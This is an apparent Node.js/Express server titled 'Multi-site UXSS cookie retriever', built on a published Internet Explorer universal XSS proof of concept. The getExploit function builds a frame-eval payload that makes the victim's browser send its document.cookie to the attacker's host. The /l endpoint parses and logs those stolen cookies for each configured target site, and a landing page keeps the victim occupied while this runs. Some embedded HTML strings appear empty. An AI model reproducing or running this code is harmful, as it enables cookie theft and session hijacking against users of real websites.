// File: app.js // Author: l0th (Daniele Bellavista) // Email: daniele.bellavista@gmail.com // // -*- coding: utf-8 -*- // vim:fenc=utf-8 // vim:foldmethod=syntax // vim:foldnestmax=1 // // jslint es5: true "use strict;"; var conf = require('./conf'); var targets = conf.targets; var onFinished = require('on-finished'); var thisHost = conf.host; var express = require('express'); var url = require('url'); var cookie = require('cookie'); var app = express(); app.use(function(req, res, next) { res.header("Cache-Control", "no-cache, no-store, must-revalidate"); res.header("Pragma", "no-cache"); res.header("Expires", 0); next(); }); var exploitObj = {}; function doRedirect(rand) { exploitObj[rand].redRes.redirect(exploitObj[rand].redUrl); onFinished(exploitObj[rand].redRes, function (err, res) { doWait(rand); }); } function doWait(rand) { setTimeout(function() { exploitObj[rand].waiRes.send(''); onFinished(exploitObj[rand].waiRes, function(err, res) { delete exploitObj[rand]; }); }, 500); } function create(rand) { exploitObj[rand] = { rDone: false, waiRes: null, redRes: null, redUrl: null }; } app.get('/r/:rand/:id', function(req, res, next) { var id = parseInt(req.params.id); var rand = req.params.rand; if (!exploitObj[rand]) create(rand); exploitObj[rand].redRes = res; exploitObj[rand].redUrl = targets[id]; if (exploitObj[rand].waiRes) { doRedirect(rand); } }); app.get('/d/:rand/:id', function(req, res, next) { var id = parseInt(req.params.id); var rand = req.params.rand; if (!exploitObj[rand]) create(rand); exploitObj[rand].waiRes = res; if (exploitObj[rand].redRes) { doRedirect(rand); } }); app.get('/l', function(req, res, next) { res.send(''); var u = url.parse(req.url); var s = /_id=(\d+)\|(.*)/.exec(u.query); var cs = cookie.parse(unescape(s[2])); console.log(targets[parseInt(s[1])]); console.log(JSON.stringify(cs, null, ' ')); }); function getExploit(rand, id) { return 'frames[0].eval(\'_=parent.frames[1];with(new XMLHttpRequest())open("get","' + thisHost + '/d/' + rand + '/' + id + '",false),send();_.location="javascript:bkp=\\\'' + thisHost + '/l?_id=' + id + '|\\\'+document.cookie;window.location(bkp);"\');'; } app.get('/exploit/:rand/:id', function(req, res, next) { var id = parseInt(req.params.id); var rand = req.params.rand; var page = [ '', '', '' ]; res.send(page.join('\n')); }); app.use(function(req, res, next) { var page = [ "Multi-site UXSS cookie retriever" ]; page.push('

Multi-size UXSS cookie retriever

'); page.push('

You can read this content while the page does its work.

'); page.push('

Original exploit: http://www.deusen.co.uk/items/insider3show.3362009741042107/

'); page.push('

Further POC: http://packetstormsecurity.com/files/130308/Microsoft-Internet-Explorer-Universal-XSS-Proof-Of-Concept.html

'); for (var k = 0; k < targets.length; k++) { page.push(''); } page.push(''); res.send(page.join('\n')); }); app.use(function(err, req, res, next) { console.error(err.stack); res.send(''); }); var http = require('http'); var server = http.createServer(app); server.listen(8080);